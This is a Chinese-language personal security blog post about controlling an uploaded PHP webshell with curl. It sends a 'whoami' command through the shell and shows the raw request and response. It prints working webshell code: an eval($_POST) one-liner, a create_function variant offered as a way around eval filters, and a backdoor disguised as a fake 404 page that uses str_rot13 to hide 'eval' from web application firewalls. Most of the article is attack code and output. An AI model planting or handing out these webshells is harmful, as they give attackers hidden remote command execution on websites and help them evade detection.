<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>curl工具连接webshell调试 | Dhayser&#39;s space</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="curl工具包含多种功能,其中可以进行调试网站接口,通过渗透测试上传的webshell可以理解为网站的远程调试及控制接口,因为webshell其特殊性,攻击者可以利用其特性对网站远程命令执行.(如果你想用postman等工具,我也拦不住你. 实际上还有专业的webshell管理工具,如某拉、某蝎、某剑、上古时期的某刀,自己写一个也没问题毕竟武器化自定义是最好的选择) 使用方法1$ curl htt">
<meta property="og:type" content="article">
<meta property="og:title" content="curl工具连接webshell调试">
<meta property="og:url" content="https://dhayser.github.io/2022/11/06/curl%E5%B7%A5%E5%85%B7%E8%BF%9E%E6%8E%A5webshell%E8%B0%83%E8%AF%95/index.html">
<meta property="og:site_name" content="Dhayser&#39;s space">
<meta property="og:description" content="curl工具包含多种功能,其中可以进行调试网站接口,通过渗透测试上传的webshell可以理解为网站的远程调试及控制接口,因为webshell其特殊性,攻击者可以利用其特性对网站远程命令执行.(如果你想用postman等工具,我也拦不住你. 实际上还有专业的webshell管理工具,如某拉、某蝎、某剑、上古时期的某刀,自己写一个也没问题毕竟武器化自定义是最好的选择) 使用方法1$ curl htt">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-11-06T07:05:29.000Z">
<meta property="article:modified_time" content="2022-11-06T15:21:26.128Z">
<meta property="article:author" content="Dhayser Li">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Dhayser's space" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Dhayser&#39;s space</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://dhayser.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-curl工具连接webshell调试" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/11/06/curl%E5%B7%A5%E5%85%B7%E8%BF%9E%E6%8E%A5webshell%E8%B0%83%E8%AF%95/" class="article-date">
  <time class="dt-published" datetime="2022-11-06T07:05:29.000Z" itemprop="datePublished">2022-11-06</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      curl工具连接webshell调试
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><a target="_blank" rel="noopener" href="https://curl.se/">curl工具</a>包含多种功能,其中可以进行调试网站接口,通过渗透测试上传的webshell可以理解为网站的远程调试及控制接口,因为webshell其特殊性,攻击者可以利用其特性对网站远程命令执行.(如果你想用postman等工具,我也拦不住你. 实际上还有专业的webshell管理工具,如某拉、某蝎、某剑、上古时期的某刀,自己写一个也没问题毕竟武器化自定义是最好的选择)</p>
<h2 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ curl http://8.8.8.8/shell.php -X POST -d <span class="string">&quot;pass=system(&quot;</span><span class="built_in">whoami</span><span class="string">&quot;);&quot;</span></span><br></pre></td></tr></table></figure>
<h2 id="原理分析"><a href="#原理分析" class="headerlink" title="原理分析"></a>原理分析</h2><h4 id="注-以PHP的webshell为例-如下为最简单的php一句话webshell木马-将其放置在网站可解析php目录下-既可以利用上传的webshell实现对网站远程命令执行-如下两种写法-皆可使用"><a href="#注-以PHP的webshell为例-如下为最简单的php一句话webshell木马-将其放置在网站可解析php目录下-既可以利用上传的webshell实现对网站远程命令执行-如下两种写法-皆可使用" class="headerlink" title="注: 以PHP的webshell为例,如下为最简单的php一句话webshell木马,将其放置在网站可解析php目录下,既可以利用上传的webshell实现对网站远程命令执行.(如下两种写法,皆可使用)"></a>注: 以PHP的webshell为例,如下为最简单的php一句话webshell木马,将其放置在网站可解析php目录下,既可以利用上传的webshell实现对网站远程命令执行.(如下两种写法,皆可使用)</h4><h4 id="eval-主要webshell执行命令时用到的功能函数-可以把传入字符串作为PHP代码执行"><a href="#eval-主要webshell执行命令时用到的功能函数-可以把传入字符串作为PHP代码执行" class="headerlink" title="eval(): 主要webshell执行命令时用到的功能函数,可以把传入字符串作为PHP代码执行;"></a>eval(): 主要webshell执行命令时用到的<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/function.eval.php">功能函数</a>,可以把传入字符串作为PHP代码执行;</h4><h4 id="POST-实现POST方法向eval-函数传入字符串的变量-让eval加以利用"><a href="#POST-实现POST方法向eval-函数传入字符串的变量-让eval加以利用" class="headerlink" title="$_POST(): 实现POST方法向eval()函数传入字符串的变量,让eval加以利用;"></a>$_POST(): 实现POST方法向eval()函数传入字符串的<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/reserved.variables.post.php">变量</a>,让eval加以利用;</h4><h4 id="pass-POST-所需要的值赋为希望系统执行的php命令-俗称webshell密码"><a href="#pass-POST-所需要的值赋为希望系统执行的php命令-俗称webshell密码" class="headerlink" title="pass: $_POST()所需要的值赋为希望系统执行的php命令,俗称webshell密码."></a>pass: $_POST()所需要的值赋为希望系统执行的php命令,俗称webshell密码.</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;pass&quot;</span>]);</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&quot;pass&quot;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="调用木马过程"><a href="#调用木马过程" class="headerlink" title="调用木马过程"></a>调用木马过程</h2><h4 id="1、将pass的值赋为需要执行的命令"><a href="#1、将pass的值赋为需要执行的命令" class="headerlink" title="1、将pass的值赋为需要执行的命令;"></a>1、将pass的值赋为需要执行的命令;</h4><h4 id="2、将pass的请求值-request-发送给服务器"><a href="#2、将pass的请求值-request-发送给服务器" class="headerlink" title="2、将pass的请求值(request)发送给服务器;"></a>2、将pass的请求值(request)发送给服务器;</h4><p>请求数据包(RAW格式):</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">POST /shell.php HTTP/1.1</span><br><span class="line">Host: 8.8.8.8:8080</span><br><span class="line">User-Agent: curl/7.79.1</span><br><span class="line">Accept: */*</span><br><span class="line">Content-Length: 20</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line"></span><br><span class="line">pass=system(whoami);</span><br></pre></td></tr></table></figure>
<h4 id="3、将响应值-response-返给客户端-最终实现对网站远程命令执行"><a href="#3、将响应值-response-返给客户端-最终实现对网站远程命令执行" class="headerlink" title="3、将响应值(response)返给客户端,最终实现对网站远程命令执行;"></a>3、将响应值(response)返给客户端,最终实现对网站远程命令执行;</h4><p>响应数据包(RAW格式):</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Date: Sun, 06 Nov 2022 07:48:40 GMT</span><br><span class="line">Server: Apache/2.4.10 (Debian)</span><br><span class="line">X-Powered-By: PHP/5.5.38</span><br><span class="line">Vary: Accept-Encoding</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Content-Type: text/html</span><br><span class="line"></span><br><span class="line">www-data.</span><br></pre></td></tr></table></figure>
<h2 id="拓展内容"><a href="#拓展内容" class="headerlink" title="拓展内容"></a>拓展内容</h2><h3 id="create-function-php木马"><a href="#create-function-php木马" class="headerlink" title="create_function php木马"></a>create_function php木马</h3><h4 id="可以用于bypass-eval-函数-使用方法与上诉webshell一致"><a href="#可以用于bypass-eval-函数-使用方法与上诉webshell一致" class="headerlink" title="可以用于bypass eval()函数,使用方法与上诉webshell一致."></a>可以用于bypass eval()函数,使用方法与上诉webshell一致.</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">create_function</span>(<span class="string">&#x27;&#x27;</span>, <span class="variable">$_REQUEST</span>[<span class="string">&#x27;pass&#x27;</span>]);</span><br><span class="line"><span class="variable">$a</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h4 id="注-此webshell仅限用于PHP版本小于7-2-php-version-lt-7-2-因为其使用的create-function-函数在PHP7-2中已经被反对无法正常执行-在PHP8-0中正式被移除"><a href="#注-此webshell仅限用于PHP版本小于7-2-php-version-lt-7-2-因为其使用的create-function-函数在PHP7-2中已经被反对无法正常执行-在PHP8-0中正式被移除" class="headerlink" title="注: 此webshell仅限用于PHP版本小于7.2(php.version &lt; 7.2),因为其使用的create_function()函数在PHP7.2中已经被反对无法正常执行,在PHP8.0中正式被移除."></a>注: 此webshell仅限用于PHP版本小于7.2(php.version &lt; 7.2),因为其使用的<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/function.create-function.php">create_function()函数</a>在PHP7.2中已经被反对无法正常执行,在PHP8.0中正式被移除.</h4><h3 id="404伪造木马"><a href="#404伪造木马" class="headerlink" title="404伪造木马"></a>404伪造木马</h3><h4 id="伪造404页面-此preg-replace函数为另一种bypass方式-将eval危险函数进行转换-防止waf识别关键字-php代码部分可以换成任意webshell-如一句话木马、create-function-php木马-使用方法与上诉webshell一致"><a href="#伪造404页面-此preg-replace函数为另一种bypass方式-将eval危险函数进行转换-防止waf识别关键字-php代码部分可以换成任意webshell-如一句话木马、create-function-php木马-使用方法与上诉webshell一致" class="headerlink" title="伪造404页面,此preg_replace函数为另一种bypass方式,将eval危险函数进行转换,防止waf识别关键字.php代码部分可以换成任意webshell,如一句话木马、create_function php木马,使用方法与上诉webshell一致."></a>伪造404页面,此<a target="_blank" rel="noopener" href="https://www.php.net/manual/en/function.preg-replace.php">preg_replace函数</a>为另一种bypass方式,将eval危险函数进行转换,防止waf识别关键字.php代码部分可以换成任意webshell,如一句话木马、create_function php木马,使用方法与上诉webshell一致.</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE HTML PUBLIC <span class="string">&quot;-//IETF//DTD HTML 2.0//EN&quot;</span>&gt;</span><br><span class="line">&lt;html&gt;&lt;head&gt;</span><br><span class="line">&lt;title&gt;<span class="number">404</span> Not Found&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;Not Found&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;The requested URL /error.php was not found on this server. &lt;/p&gt;</span><br><span class="line">&lt;/body&gt;&lt;/html&gt;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">(<span class="variable">$b</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;pass&#x27;</span>]) &amp;&amp; @<span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/ad/e&#x27;</span>,<span class="string">&#x27;@&#x27;</span>.<span class="title function_ invoke__">str_rot13</span>(<span class="string">&#x27;riny&#x27;</span>).<span class="string">&#x27;($b)&#x27;</span>, <span class="string">&#x27;add&#x27;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="留言区"><a href="#留言区" class="headerlink" title="留言区"></a>留言区</h2><p>TODO</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://dhayser.github.io/2022/11/06/curl%E5%B7%A5%E5%85%B7%E8%BF%9E%E6%8E%A5webshell%E8%B0%83%E8%AF%95/" data-id="clbd1q5hp0003odhfezp87ws7" data-title="curl工具连接webshell调试" class="article-share-link">Share</a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/11/08/%E8%AE%BE%E5%A4%87%E7%BC%BA%E7%9C%81%E5%8F%A3%E4%BB%A4/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          设备缺省口令
        
      </div>
    </a>
  
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/12/">December 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/12/07/webpack%E5%89%8D%E7%AB%AF%E6%BA%90%E7%A0%81%E8%BF%98%E5%8E%9F%E6%BC%8F%E6%B4%9E/">webpack前端源码还原漏洞</a>
          </li>
        
          <li>
            <a href="/2022/11/30/%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81%E5%88%9D%E8%AF%86%EF%BC%88%E4%B8%80%EF%BC%89/">内存取证初识（一）</a>
          </li>
        
          <li>
            <a href="/2022/11/28/74CMS%E5%88%86%E6%9E%90%E6%80%BB%E7%BB%93/">74CMS分析总结</a>
          </li>
        
          <li>
            <a href="/2022/11/26/BeanShell%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">BeanShell任意命令执行</a>
          </li>
        
          <li>
            <a href="/2022/11/24/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E7%BB%8F%E9%AA%8C%E8%AE%B0%E5%BD%95/">内网渗透经验记录</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 Dhayser Li<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>